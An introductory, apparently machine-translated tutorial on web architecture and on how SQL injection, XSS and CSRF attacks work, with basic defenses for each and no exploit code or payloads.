Table of contents
SQL injection attack - attack on website database
XSS cross-site scripting attack - an attack on the user's browser
CSRF cross-site request forgery attack - an attack on the user's browser
The difference between the three attack methods
Web basics
What is the Web
Web refers to the World Wide Web, also known as www. is a system of many interconnected hypertexts, accessed via the Internet
We usually surf the Internet through the browser through the Web
The composition of the Web
The Web is mainly composed of three parts: client, server (the script engine runs on the server), and database.
The client (browser) is called the front end, and the server and database are called the back end.
The development history of the Web
Web1.0 In the early stage of the World Wide Web, a large number of static interfaces were used for users to read, and users could not add or modify them (such as personal websites)
Web2.0 can add and modify content on web pages (such as blog writing and human-to-human interaction)
Security risks in Web1.0
Mainly SQL injection and upload vulnerabilities, mainly harming web servers
Security risks in Web2.0
There are more and more security risks in Web2.0. Common ones include XSS, CSRF, data hijacking, etc.
Attacks gradually target web users
Web server introduction
Development of web server
The web server actually develops along with the Web.
The static page era of the Web
The server composes static pages through HTML and other suffix files for client access.
Dynamic pages of the Web period 1
The server provides dynamic pages, and dynamic pages are driven by scripts (PHP script files), because the client cannot recognize script files such as php and js.
Therefore, the PHP script file needs to be parsed into an HTML file through the server-side language interpreter, and sent to the Web client for display (the suffix of the file seen by the browser is PHP, not HTML)
Dynamic page period of the Web 2
When the number of page views is very large, a database service is urgently needed to provide data support for the Web server.
When we perform page operations, the PHP script file passes through the server-side language interpreter, parses and executes to retrieve/write data to the database, and then the database returns the corresponding data.
When this data passes through the language parser, it is assembled into an HTML file and then sent to the browser.
The language interpreter generally runs on the same server as the web server, and the two use configuration files to connect
The script is also connected to the database service through the configuration file to perform related database operations.
Then the web server, language interpreter, and database service constitute the current web server/back-end architecture.
Web workflow
How it works from a client (browser) perspective
That is, the communication process of HTTP/HTTPS
Explanation of HTTP, HTTPS, SSL protocols and related messages-CSDN Blog
What are the currently popular web backend architectures?
These architectures are not fixed and can also be combined very flexibly.
How to build a simple Web server environment with Windows+Apache+PHP+MySQL
By downloading an integrated software phpStudy, you can build a simple web server environment. After installing the software, apache and mysql services will be automatically installed (the user name and password of Mysql are both root).
After the installation is complete, where is the /.php file of the web page?
The /.php file is stored in the WWW directory under the software installation directory.
The content displayed when the default web page is opened is the content of the file.
Create your own web page
We can write our own web page HTML/PHP file and put it in this directory (under the WWW directory). Then when we visit the specified directory of the website, this web page will pop up.
For example: when we create a 123.html file in the www directory, and we access the web page 127.0.0.1/123.html, the content of 123.html will be displayed.
Web attack
Top 10 application security risks
SQL injection attack - attack on website database
Why does SQL injection occur?
Let’s first understand the composition of the url: https://kaifa.baidu.com/searchPage ?wd=cdn&hmsr=aladdin , among which the purple part after ? is the data of variables that our users can enter, through which different variables can be obtained directly from the database The data
How to implement SQL injection
SQL injection means that when programmers write code (scripts stored on the server side), they fail to judge the legality of user input data, causing security risks in the application.
The hacker inserts a database query code when inputting data. When the URL reaches the server, the server calls the database to execute the query statement, and then returns the result to the hacker, so that the hacker can get some data or information he wants to know. Perform database operations
That is: the process of requesting a web form through post/get, etc., inserting a SQL statement into the query string of the input domain name or page request, changing the meaning of the original query, and ultimately causing the web server to execute malicious commands.
Dangers of SQL
Database information collection
Add, delete, and modify operations on the database
Control the operating system with the help of certain functions of the database (such as SQL Server's built-in stored procedure XP_CMDShell)
SQL Defense
Limit the user's input data (the parameter part in the submitted URL request), the data the user gets from the cookie (no important data will be returned), and the data passed in from other systems (ie: any input that comes into contact with the user) Click, you need to do some filtering of user input)
Deploy anti-SQL injection system or script
Specific restriction methods:
Whitelist: restrict the format of passed data
Blacklist: filter special strings (update, delete, etc.), filter special characters
XSS cross-site scripting attack - an attack on the user's browser
XSS principle
The attacker enters malicious HTML code into a website with XSS vulnerabilities (the programmer does not filter the data submitted by the user). When other users browse the website, the HTML code will be automatically executed, thereby achieving the purpose of the attack (such as : Steal users’ cookies, destroy page structure, redirect to other websites, etc.)
For example: Website A has a message function, and the programmer does not filter the data submitted by the user. At this time, the hacker generates malicious HTML code and inputs it to the server through the message function. Later, when a user accesses the message board function, the hacker will Will automatically execute malicious code
Classification of XSS
Reflected XSS attack (non-persistent)
Inducing users to visit a URL containing malicious code, the XSS code will be triggered when the user clicks the link (there is no such page or content on the server)
Stored XSS attack (persistence)
Store the code in the web server or database by submitting it, and trigger the code execution when the user accesses the page.
defense method
Purchase security equipment such as firewalls to filter web content
Filter user-entered data in the program
Use http only to prevent JS from reading cookie values
CSRF cross-site request forgery attack - an attack on the user's browser
Steal the victim's information through XSS and other methods (XSS is one of the many ways to implement CSRF), and then the attacker forges the victim's identity and initiates a malicious request as the victim. However, this malicious request is not targeted at the server side. Considered a normal request
To complete a CSRF operation, the user must perform the following operations
Log in to trusted website A and generate cookies locally
Without logging out of A, visit dangerous website B (dangerous websites use CSRF vulnerabilities to insert image links on website A to induce users to click)
At this point, the hacker can access website A as the user
Protective measures
The server does not confirm whether the request is voluntarily initiated by the user. It can be protected through the following methods:
Protect through security products (verify HTTP Referer field, add token verification to request address, etc.)
When ending a website visit, do not close the browser directly, but log out first.
The difference between the three attack methods
They are mainly distinguished by the purpose of the attack.
SQL injection: Obtain sensitive information in the database
XSS: Controls the user's browser to execute malicious scripts and steal information
CSRF: By forging the identity of the victim, the attacker can do whatever the victim can do.
